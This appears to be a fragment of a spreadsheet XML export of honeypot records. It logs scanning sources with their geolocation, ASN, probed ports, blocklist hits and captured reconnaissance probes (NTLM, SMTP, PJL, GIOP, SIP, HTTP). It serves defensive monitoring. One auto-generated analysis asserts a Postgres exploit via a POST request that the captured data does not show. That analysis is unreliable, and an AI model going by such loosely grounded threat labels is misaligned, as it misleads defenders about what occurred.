    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_SMTP_H10&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_MYSQL_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21819&amp;&amp;3306&amp;&amp;443&amp;&amp;80&amp;&amp;25&amp;&amp;1433&amp;&amp;1080&amp;&amp;1521&amp;&amp;45629&amp;&amp;3389&amp;&amp;33244&amp;&amp;110&amp;&amp;6379&amp;&amp;55000&amp;&amp;NA&amp;&amp;5900&amp;&amp;54158&amp;&amp;123&amp;&amp;5432&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5665"/>
    <s v="126.978"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="Ucloud Information Technology (hk) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;command&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'TLRMTVNTUAABAAAAB4IIOAAAAAAAAAAAAAAAAAAAAAA=', 'data': 'None'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POP3:{'args': 'NTLM', 'cmd': 'AUTH'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_NTP:{'mode': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (101.36.114.222,44912)}&amp;&amp;{Data_SMB:Incoming connection (101.36.114.222,53312)}&amp;&amp;{Data_SMB:Incoming connection (101.36.114.222,56044)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6524:72de"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze activity."/>
    <m/>
  </r>
  <r>
    <x v="226"/>
    <x v="226"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T07:28:03"/>
    <d v="2024-04-02T05:01:00"/>
    <d v="2025-04-30T07:28:03"/>
    <n v="327"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_SIP_H44&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_FTP_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;64017&amp;&amp;445&amp;&amp;143&amp;&amp;5432&amp;&amp;3306&amp;&amp;3389&amp;&amp;25&amp;&amp;110&amp;&amp;NA&amp;&amp;443&amp;&amp;1433&amp;&amp;21&amp;&amp;9100&amp;&amp;23&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="178"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;GET&amp;&amp;command&amp;&amp;login&amp;&amp;NA&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.234.67.80:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.37.11:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.146,54464)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.146,44038)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.146,45892)}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.74.222.213:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.60.171.39:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.146.12.172:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.209.6:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.79.122:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.146,56308)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (HCyYWzUY,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.115.66:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.60.209.6:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.146;rport=57387'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.211.202.140:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8d92"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="Possible attempt to exploit Postgres database vulnerability by sending POST request, which could lead to unauthorized access or data theft. The lack of response suggests the attacker might be probing for vulnerabilities. This may indicate reconnaissance activity by an attacker. &amp;&amp; There is insufficient information to analyze, as there is no log data provided. &amp;&amp; Someone is attempting to access a service on an IP address with a suspicious port number, possibly for reconnaissance or testing purposes. This activity could be the start of a larger malicious attack. The target appears to be a web server. &amp;&amp; Potential malicious activity detected - unauthorized connection to a server, likely an attempt to access a web service without permission._x000a_The request is for the root directory of the website, which could be a scouting mission to identify vulnerabilities._x000a_This activity may indicate reconnaissance or probing to map out server infrastructure."/>
    <s v="SQL Injection &amp;&amp; Port Scan &amp;&amp; Brute Scan"/>
  </r>
  <r>
    <x v="227"/>
    <x v="227"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T07:21:03"/>
    <d v="2025-04-30T07:21:03"/>
    <d v="2025-04-30T07:21:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:14bc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="228"/>
    <x v="228"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T07:11:42"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-30T07:11:42"/>
    <n v="286"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_MYSQL_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;110&amp;&amp;3306&amp;&amp;25&amp;&amp;1433&amp;&amp;445&amp;&amp;9100&amp;&amp;21&amp;&amp;389&amp;&amp;5432&amp;&amp;NA&amp;&amp;143&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;login&amp;&amp;command&amp;&amp;request&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.4.48.242:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.118.77:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (XjPuaHZn,)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.151;rport=49383'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.151;rport=39650'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.74.222.213:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '154.93.37.45:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.151,57338)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (chyODXyX,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 66.94.127.183:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '149.102.153.168:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.8.69:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8d97"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="229"/>
    <x v="229"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T07:02:42"/>
    <d v="2025-04-30T07:02:42"/>
    <d v="2025-04-30T07:02:42"/>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2:1b03"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="230"/>
    <x v="230"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T07:01:23"/>
    <d v="2024-04-11T12:55:00"/>
    <d v="2025-04-30T07:01:23"/>
    <n v="349"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_NTP_H21&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_NTP_H9&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MYSQL_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;18939&amp;&amp;143&amp;&amp;3389&amp;&amp;1433&amp;&amp;445&amp;&amp;5432&amp;&amp;9100&amp;&amp;161&amp;&amp;NA&amp;&amp;1521&amp;&amp;50833&amp;&amp;50893&amp;&amp;5900&amp;&amp;443&amp;&amp;48957&amp;&amp;53152&amp;&amp;49664&amp;&amp;1080&amp;&amp;110&amp;&amp;53565&amp;&amp;6379&amp;&amp;60954&amp;&amp;3306&amp;&amp;6667&amp;&amp;50347&amp;&amp;52781&amp;&amp;80&amp;&amp;389&amp;&amp;21&amp;&amp;49204&amp;&amp;54088&amp;&amp;55333&amp;&amp;49395&amp;&amp;52734&amp;&amp;54607&amp;&amp;56184"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}"/>
    <n v="138"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
